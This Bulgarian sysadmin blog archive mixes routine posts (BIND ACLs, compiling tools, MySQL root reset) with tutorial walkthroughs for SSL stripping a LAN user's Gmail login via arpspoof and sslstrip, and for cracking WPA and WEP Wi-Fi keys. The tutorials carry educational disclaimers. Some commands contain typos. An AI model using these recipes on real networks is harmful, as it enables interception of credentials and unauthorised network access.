Category Archives: sadmin

sadmin

Позволяне на dns заявки от конкретна мрежа

Идеята е когато пуснете bind да не позволявате на всеки да го ползва като dns. За целта във "named.conf.options" се добавя:

acl "allow_networks" { 172.16.0.0/16;11.81.22.0/24; };
options {
allow-query { "allow_networks"; };

};

В тези редове става ясно, че дефинираме access list в коята включваме мрежите 172.16.0.0/255.255.0.0(/16) и 11.81.22.0/255.255.255.0(/24)
и по- долу позволяваме тази access листа.

Когато рестартирате bind този които не е оторизиран да ползва dns-a няма да резолва нищо и лога му ще се пълни със следното:

Jan 29 13:31:58 ns1 named[2182]: client 172.11.XX.70#58072: query (cache) 'borhanoudz.no-ip.biz/A/IN' denied
Jan 29 13:31:58 ns1 named[2182]: client 172.11.XX.242#1043: query (cache) 'www.kevche.com/A/IN' denied
Jan 29 13:31:58 ns1 named[2182]: client 172.11.XX.70#51444: query (cache) 'borhanoudz.no-ip.biz/A/IN' denied
Jan 29 13:31:58 ns1 named[2182]: client 172.11.XX.182#57970: query (cache) 'urs.microsoft.com/A/IN' denied
Jan 29 13:31:58 ns1 named[2182]: client 172.11.XX.70#60347: query (cache) 'borhanoudz.no-ip.biz/A/IN' denied
Jan 29 13:31:58 ns1 named[2182]: client 172.11.XX.134#1139: query (cache) 'www.mywebsearch.com/A/IN' denied
Jan 29 13:31:58 ns1 named[2182]: client 172.11.XX.188#60128: query (cache) 'www.mywebsearch.com/A/IN' denied
Jan 29 13:31:58 ns1 named[2182]: client 172.11.XX.70#61412: query (cache) 'borhanoudz.no-ip.biz/A/IN' denied
Jan 29 13:31:58 ns1 named[2182]: client 172.11.XX.70#53057: query (cache) 'borhanoudz.no-ip.biz/A/IN' denied
Jan 29 13:31:58 ns1 named[2182]: client 172.11.XX.134#1139: query (cache) 'www.mywebsearch.com/A/IN' denied
Jan 29 13:31:58 ns1 named[2182]: client 172.11.XX.70#54304: query (cache) 'borhanoudz.no-ip.biz/A/IN' denied
Jan 29 13:31:58 ns1 named[2182]: client 172.11.XX.188#49513: query (cache) 'www.mywebsearch.com/A/IN' denied

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Аудит на wpa парола, чрез aircrack и sqlite(80 000 пъти по- бързо)

Понеже доста съм писал по- долу ще обясня с едно изречение каква е идеята. Ако се ползва aircrack за нормален аудит (в моята машина дву процесорна на 2x3Ghz) ще тества по 500 ключа в секунда, а по- този метод по- долу aircrack + sqlite ще тества по 40 000 ключа в секунда.

Преди да компилираме aircrack с поддържка на sqlite трябва да го инсталираме както и неговия  development пакет:

apt-get install libsqlite3-dev sqlite3

Сега ще изтеглим aircrack и ще го компилираме със sqlite3 поддръжка:

cd /root/
mkdir testing;
cd testing;
mkdir aircrack_compile
cd aircrack_compile;

wget http://download.aircrack-ng.org/aircrack-ng-1.0.tar.gz
tar zxvf aircrack-ng-1.0.tar.gz
cd aircrack-ng-1.0

make sqlite=true unstable=true
make sqlite=true unstable=true install

Необходимо е да изпълним следната команда за да се изтегли OUI файла:

airodump-ng-oui-update

Излиза следното съобщение:

[*] Downloading IEEE OUI file…
[*] Parsing OUI file…
[*] Airodump-ng OUI file successfully updated

Сега ще тестваме компилираният от нас aircrack като използваме wordlist без Sqlite:

Преди това може да видим каква е машината и забелязваме, че е двупроцесорна като всеки процесор е 3Ghz със 2 GB памет.

Сега ще тестваме с wordlist от 75000 ключа:

aircrack-ng -w /root/testing/wordlist.txt /root/testing/wireless_packets/wpa-01.cap


Забелязваме, че средно тества между 500-600 ключа за секунда

Което означава, че за да се тестват всичките ключове ще са необходими 75000/500=150 секунди=2.5 мин.

След като имам готов wordlist трябва да направя и ssidlist.txt където да опиша ssid-а на които ще правим аудит:

vim ssidlist.txt

Сега ще подготвим нашата sqlite база за да тестваме aircrack със sqlite поддръжка.

След като вече компилирахме aircrack е необходимо да импортнем ssid-овете и списъка с пароли които ще тестваме в sqlite базата mpetrov:

airolib-ng mpetrov1 --import essid /root/testing/ssidlist.txt
airolib-ng mpetrov1 --import passwd /root/testing/wordlist.txt
airolib-ng mpetrov1 --stats
airolib-ng mpetrov1 --clean all
airolib-ng mpetrov1 --batch (Бъдете търпеливи :) )
airolib-ng mpetrov1 --verify all

След като подготвихме базата ще направим тест на aircrack със sqlite

aircrack-ng –r mpetrov1 /root/testing/wireless_packets/wpa-01.cap

Опа. Забелязваме, че aircrack в комбинация със sqlite тества по 40 000 ключа за секунда или времето което е необходимо за превъртането на този wordlist е по- малко от 2 секунди.

Разликата между нормален aircrack (2.5 мин.) и aircrack със sqlite поддържка (< 2 сек.) е повече от ясна :)

Идеята на тази публикация е да направите аудит НА СОБСТВЕНАТА СИ WIRELESS МРЕЖА, А НЕ ДА ЗЛОУПОТРЕБЯВАТЕ!

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: +1 (from 1 vote)

Компилиране на coWPAtty под Debian

coWPAtty е приложение което се използва за bruteforce на WPA PSK. Полезен е за аудит на вашата Wireless мрежа.

apt-get install && apt-get instal gcc libssl-dev libpcap-dev
wget http://wirelessdefence.org/Contents/Files/cowpatty-4.2.tgz
tar zxvf cowpatty-4.2.tgz
cd cowpatty-4.2
make

Тук го компилирах на една машинка и се сблъсках (LOL) със следните грешки като след всяка грешка е

решението .

Първа грешка:

cc -pipe -Wall -DOPENSSL  -O2 -g3 -ggdb   -c -o md5.o md5.c
md5.c:25:25: error: openssl/md5.h: мЪЛЮ РЮЙЗБ ТЮИК ХКХ ДХПЕЙРНПХЪ
md5.c: In function 'md5_mac':
md5.c:33: error: 'MD5_CTX' undeclared (first use in this function)
md5.c:33: error: (Each undeclared identifier is reported only once
md5.c:33: error: for each function it appears in.)
md5.c:33: error: expected ';' before 'context'
md5.c:34: warning: implicit declaration of function 'MD5_Init'
md5.c:34: error: 'context' undeclared (first use in this function)
md5.c:35: warning: implicit declaration of function 'MD5_Update'
md5.c:38: warning: implicit declaration of function 'MD5_Final'
md5.c: In function 'hmac_md5_vector':
md5.c:45: error: 'MD5_CTX' undeclared (first use in this function)
md5.c:45: error: expected ';' before 'context'
md5.c:53: error: 'context' undeclared (first use in this function)
make: *** [md5.o] Error 1

Решение: apt-get install libssl-dev

Втора грешка:
cc -pipe -Wall -DOPENSSL  -O2 -g3 -ggdb   -c -o sha1.o sha1.c
cc -pipe -Wall -DOPENSSL  -O2 -g3 -ggdb   -c -o utils.o utils.c
utils.c:34:18: error: pcap.h: мЪЛЮ РЮЙЗБ ТЮИК ХКХ ДХПЕЙРНПХЪ
In file included from utils.c:35:
utils.h:29: error: expected ')' before '*' token
utils.c:142: error: expected ')' before '*' token
make: *** [utils.o] Error 1

Решение: apt-get install libpcap-dev

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Компилиране на cmdiag

Това е инструмент за диагностика на DOCSIS кабелни модеми.
Изтегля информацията от модема в реално време и показва ключови параметри по отношение на мрежата. Инструмента е писан на С++ и работи на Linux и FreeBSD.

Сваляне: http://sourceforge.net/projects/cmdiag/
Официална страница: http://sourceforge.net/projects/cmdiag/
Картинки: http://sourceforge.net/project/screenshots.php?group_id=212972

Лиценз: GPL

Имах проблеми при компилирането на cmdiag версия 0.2

При изпълнение на make получавах следната грешка:

traffic:/tmp/cmdiag-0.2# make
g++ -Wall -O2  -c cmdiag.cpp
cmdiag.cpp:12:21: error: ncurses.h: Няма такъв файл или директория
cmdiag.cpp: In function 'int main(int, char**)':
cmdiag.cpp:28: warning: deprecated conversion from string constant to 'char*'
cmdiag.cpp:29: warning: deprecated conversion from string constant to 'char*'
cmdiag.cpp:30: warning: deprecated conversion from string constant to 'char*'
cmdiag.cpp:31: warning: deprecated conversion from string constant to 'char*'
cmdiag.cpp:33: error: 'initscr' was not declared in this scope
cmdiag.cpp:34: error: 'cbreak' was not declared in this scope
cmdiag.cpp:35: error: 'noecho' was not declared in this scope
cmdiag.cpp:36: error: 'stdscr' was not declared in this scope
cmdiag.cpp:36: error: 'TRUE' was not declared in this scope
cmdiag.cpp:36: error: 'keypad' was not declared in this scope
cmdiag.cpp:37: error: 'start_color' was not declared in this scope
cmdiag.cpp:38: error: 'curs_set' was not declared in this scope
cmdiag.cpp:40: error: 'A_BOLD' was not declared in this scope
cmdiag.cpp:40: error: 'attron' was not declared in this scope
cmdiag.cpp:41: error: 'mvwaddstr' was not declared in this scope
cmdiag.cpp:42: error: 'attroff' was not declared in this scope
cmdiag.cpp:45: warning: deprecated conversion from string constant to 'char*'
cmdiag.cpp:45: warning: deprecated conversion from string constant to 'char*'
cmdiag.cpp:115: error: 'refresh' was not declared in this scope
cmdiag.cpp:210: error: 'mvaddnstr' was not declared in this scope
cmdiag.cpp:211: error: 'strstr' was not declared in this scope
cmdiag.cpp:272: error: 'endwin' was not declared in this scope
make: *** [cmdiag.o] Error 1

Проблемът е, че няма ncurses-dev за целта го инсталиране: apt-get install libncurses5-dev и изпълняваме отново "make clean && make"

Отново получаваме грешна, но от друг характер, а именно:

traffic:/tmp/cmdiag-0.2# make clean && make
rm -f *.o
rm -f cmdiag
rm -f *.*~
g++ -Wall -O2  -c cmdiag.cpp
cmdiag.cpp: In function 'int main(int, char**)':
cmdiag.cpp:28: warning: deprecated conversion from string constant to 'char*'
cmdiag.cpp:29: warning: deprecated conversion from string constant to 'char*'
cmdiag.cpp:30: warning: deprecated conversion from string constant to 'char*'
cmdiag.cpp:31: warning: deprecated conversion from string constant to 'char*'
cmdiag.cpp:45: warning: deprecated conversion from string constant to 'char*'
cmdiag.cpp:45: warning: deprecated conversion from string constant to 'char*'
cmdiag.cpp:211: error: 'strstr' was not declared in this scope
make: *** [cmdiag.o] Error 1

Тази грешка е причинена от това, че във файл cmdiag.cpp липсва хедъра string.h за целта добавяме в cmdiag.cpp  :

#include <string.h>

След това изпълняваме отново  "make clean && make" и всичко се компилира точно и вече имаме cmdiag

Ето снимка на cmdiag:

VN:F [1.9.22_1171]
Rating: 0.0/5 (0 votes cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Премахване паролата на Windows

Днес вечерта мисля да направя видео демонстрация как се премахва паролата на потребител в Windows NT/2k/XP/Vista. Идеята е, че ако си забравите паролата и неможете да си влезете в профила не е необходимо да преинсталирате целия Windows, а просто да я премахнете :) .

VN:F [1.9.22_1171]
Rating: 4.0/5 (2 votes cast)
VN:F [1.9.22_1171]
Rating: +1 (from 1 vote)

SSL Hijacking- Видео демонстрация

Здравейте отново от мен Мартин Петров и както винаги тази видео демонстрация е създадена с учебна цел. Авторът не носи отговорност за потенциални щети нанесени от демонстрацията.

Сега ще ви демонстрирам как можете да подслушвате SSL връзки или SSL Hijachking чрез sslstrip от Moxie Marlinspike.

Преди всичко трябва да сканираме своята мрежа и да си изберем потребител на които ще подслушваме SSL връзката.
Отваряме терминал едно и сканираме нашата мрежа

Избираме потребител с IP адрес 192.168.1.100

Сега ще се подготвим за нашият SSL Hijacking като отварим терминал 1 и  редактираме /etc/etter.conf

Позволяваме форвардинг
echo 1 > /proc/sys/net/ipv4/ip_forward

Сега пренасочваме порт 80 към 10 000 с iptables

iptables -t nat -A PREROUTNIG -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Сега изпълняваме arp спуфинг

arpspoof -i eth0 -t 192.168.1.100 192.168.1.1

В терминал две стартираме sslstrip с аргумент -a -k -f

sslstrip -a -k -f

И в терминал 3 стартираме ettercap за да видим резултата от всичко това :)

ettercap -T -q -i eth0

Хайде сега да наблюдаваме машината на потребителя

Сега потребителят ще отвори сайт с криптирана връзка HTTPS. Например gmail: https://mail.google.com

Въвежда примерно потребителско име и парола

Ще погледнем ettercap в нашата машина. Виждаме потребителското име и паролата които потребителя  въведе по- рано. Всичко се вижда в чист текст като се има впредвид, че връзката беше реализирана чрез https.

По същия начин могат да се прослушват и нормални връзки към страници работещи на 80-ти порт.

Сега потребителя ще отвори уеб сайта arenabg.com и ще въведе примерно потребителско име и парола
Отново виждаме потребителското име и парола.

Видео демонстрация SSL Hijacking:

1. Видео демонстрация качена във vbox
2. Видео демонстрация качена във youtube

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Разбиване на Wireless с WPA encoding

Здравейте отново с мен Мартин Петров. Предния път ви демонстрирах как се разбива Wireless с WEP, а сега ще ви обясня как се разбива Wireless с WPA/PSK.

За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея .

След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг

# iwconfig wlan0 mode monitoring

След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел

# airodump-ng wlan0

Понеже търсим wireless със WPA кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде "mpetrov_net" на шести канал.

След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем в Терминал 2 airodump за да събирем информация за съответната мрежа.

# airodump-ng -w wpa -c 6 --bssid 00:23:CD:D7:84:FC wlan0

Сега ще отворим Терминал 3 за да изпратим пакети за ре- оторизация. Ще трябва да използваме MAC адреса на клиента които можем да вземем от Терминал 1.

# aireplay-ng -0 1 -a 00:23:CD:D7:84:FC -c 00:1A:73:87:B4:E9 wlan0

След това ще погледнем Терминал 2 и ще видим горе в дясно WPA handshake: 00:23:CD:D7:84:FC с което приключваме събирането на пакети и пристъпваме към кракване на паролата.

За кракване на паролата ще използваме два метода единият е, чрез aircrack, а другият , чрез cowpatty

Първо ще реализираме кракване с aircrack

cd /pentest/wireless/aircrack-g/test
aircrack-ng -w password.lst /root/wpa-01.cap

Сега ще направим кракване с cowpatty:

cd /pentest/wireless/cowpatty
./cowpatty -r /root/wpa-01.cap -f dict -s mpetrov_net

И двата метода успяват да кракнат паролата и да я изведат.

Видео демонстрация от youtube.com: Разбиване на Wireless с WPA encoding (youtube)
Видео демонстрация от vbox7.com:
Разбиване на Wireless с WPA encoding (vbox7)
Надявам се, че този видео материал ще бъде използван и интерпретиран единствено с учебна цел.

До скоро от mpetrov.net

PS: Това е истината-> EPRB

Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:

Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.

Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.

VN:F [1.9.22_1171]
Rating: 5.0/5 (5 votes cast)
VN:F [1.9.22_1171]
Rating: +3 (from 3 votes)

Разбиване на Wireless с WEP encoding

Тук ще демонстрирам как се декодира ключ от wireless мрежа с кодиране WEP. Правя този видео материал защото много отдавна очаквах някои да сподели тази демонстрация в нашето българско интернет пространство, но уви никои не го направи.

Тук ще опиша как можем да вземем ключа на wireless мрежа с WEP кодиране.

За целта ще използваме live дистрибуцията BackTrack 4 и приложенията в нея ifconfig,iwconfig,airodump, aireplay и aircrack.

След като сме заредили нашият BackTrack ще отворим терминал за да подготвим нашият мрежови интерфейс за работа в режим мониторинг

# iwconfig wlan0 mode monitoring;

След като настроихме мрежовият ни интерфейс сега ще сканираме за wireless мрежа която да компрометираме с учебна цел

# airodump-ng wlan0

Понеже търсим wireless със WEP кодиране,а тук виждаме такъв прекратяваме с Контрол и C. Wireless мрежата която ще използваме ще бъде "mpetrov_net" на шести канал.

След като избрахме коя мрежа да използваме и видяхме, че тя работи на шести канал е време да пуснем airodump за да събирем информация за съответната мрежа.

# airodump-ng -w wep -c 6 --bssid 00:23:CD:D7:84:FC wlan0 (postoqnno raboti)

Сега ще отворим още един терминал в които ще използваме ARP Reply attack за да увеличим броя на дейта пакетите и да вземем инициализиращите вектори или IV на избраният по- рано Access Point.

# aireplay-ng -3 -b 00:23:CD:D7:84:FC wlan0

Оставяме aireplay пуснат и наблюдаваме Терминал 1. За да имаме успеваемост на разбиване на ключа е необходимо да съберем над 20 000 дейта пакети, след което ще прекратим airodump-ng и aireplay-ng.

След като събрахме над 22 000 дейта пакети прекратяваме airodump с Контрол и C и aireplay с Контрол и C

Сега имаме всичко необходимо за да декодираме ключа на wireless мрежата "mpetrov_net" като използваме aircrack за целта.

aircrack-ng wep-03.cap

Тук виждаме, че ключът е 9781238761 и е кракнат със 100% успеваемост.

Надявам се, че този видео материал ще бъде използван и интерпретиран единствено с учебна цел.

Видео материал във vbox7.com: Разбиване на Wireless с encoding Wep
Видео материал във youtube.com: Разбиване на Wireless с encoding Wep

Според нашия Наказателен Кодекс манипулирането на wireless мрежи е незаконно:

Чл. 212а. (Нов -- ДВ, бр. 92 от 2002 г.) (1) (Изм. -- ДВ, бр. 38 от 2007 г.) Който с цел да набави за себе си или за другиго облага възбуди или поддържа заблуждение у някого, като внесе, измени, изтрие или заличи компютърни данни или използва чужд електронен подпис и с това причини на него или на другиго вреда, се наказва за компютърна измама с лишаване от свобода от една до шест години и глоба до шест хиляди лева.
(2) (Изм. -- ДВ, бр. 38 от 2007 г.) Същото наказание се налага и на този, който, без да има право, внесе, измени, изтрие или заличи компютърни данни, за да получи нещо, което не му се следва.

Вместо да правите такива гимнастики проосто си платете интернета и ще го имате винаги.

VN:F [1.9.22_1171]
Rating: 5.0/5 (3 votes cast)
VN:F [1.9.22_1171]
Rating: +2 (from 2 votes)

Linux модул за TP-LINK TL-WN321G

Идеята на този пост е да обясни на начинаещите как да ползват своя wireless usb tplink wn321g под Linux. Модула за TP-LINK TL-WN321G е : rt73usb

За да го заредите изпълнете: modprobe rt73usb

За да видите дали е зареден правилно се изпълнява: iwconfig :)

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)

Как да възстановим своята root парола за MySQL

Ако на някои му се случи да си забрави root паролата за MySQL да изпълни следните стъпки и тя ще бъде нулирана(или въведена нова такава):

#Това убива стартирания mysqld(най- добре е да го спрете нормално,но  ако не можете просто го килнете както е по- долу)
killall -9 mysqld_safe && killall -9 mysqld;

#Стартираме го без права
mysqld_safe --skip-grant-tables --old-passwords &

#Сетваме нулева парола за root
mysql -uroot -e "UPDATE mysql.user SET Password=PASSWORD(") WHERE User='root'";

Това е всичко от мен приятели (rofl) :)

PS: Има и друг вариант с mysql-init : mysqld_safe --init-file=mysql-init &

VN:F [1.9.22_1171]
Rating: 5.0/5 (1 vote cast)
VN:F [1.9.22_1171]
Rating: 0 (from 0 votes)